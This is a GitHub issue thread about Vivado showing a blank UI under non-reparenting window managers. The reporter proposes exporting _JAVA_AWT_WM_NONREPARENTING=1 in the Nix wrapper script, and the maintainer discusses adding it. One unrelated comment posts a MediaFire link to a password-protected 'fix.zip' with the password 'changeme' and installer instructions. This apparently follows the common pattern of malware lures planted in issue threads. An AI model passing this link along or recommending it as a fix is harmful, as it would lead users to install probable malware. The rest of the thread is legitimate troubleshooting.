### ISSUE TITLE
Blank UI when using WM

### ISSUE THREAD

**Issue by Ic-arbon** [lschuermann/nur-packages#15]
I got blank UI when using dwm.
Then I follow [Arch wiki](https://wiki.archlinux.org/title/Xilinx_Vivado#Blank/grey_UI_when_using_WM_(non-reparenting_window_manager)) to fix it.
```
$ _JAVA_AWT_WM_NONREPARENTING=1 vivado
```

I guess it can be fixed. ( Not sure. I'm just a beginner in shell.)
```shell
# pkgs/vivado/builder-2020_1.sh
...
- wrapProgram $out/opt/Vivado/2020.1/bin/vivado --prefix LD_LIBRARY_PATH : "$libPath"
+ wrapProgram $out/opt/Vivado/2020.1/bin/vivado \
+ --prefix LD_LIBRARY_PATH : "$libPath" \
+ --run "export _JAVA_AWT_WM_NONREPARENTING=1"
...
```

Hope you are not getting tired of me for a small question  :)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lschuermann** [comment]
Yeah, I'm aware of this issue and also ran into it using i3 and EXWM. I don't know whether `_JAVA_AWT_WM_NONREPARENTING=1` is a universal fix, and doesn't break on other platforms. However, given the amount of people running into these issues, I'd be fine with including it in the derivation itself.

Would you like to open a pull request to add this flag?

**Comment by Ic-arbon** [comment]
> I don't know whether `_JAVA_AWT_WM_NONREPARENTING=1` is a universal fix, and doesn't break on other platforms.

Oh, this is something I hadn't taken into consideration. 
I currently don't have time to verify the situation on other distro, and I think keeping this modification for now can prevent some unexpected errors. Therefore, I won't open a pull request. 

Thank you for your prompt response!
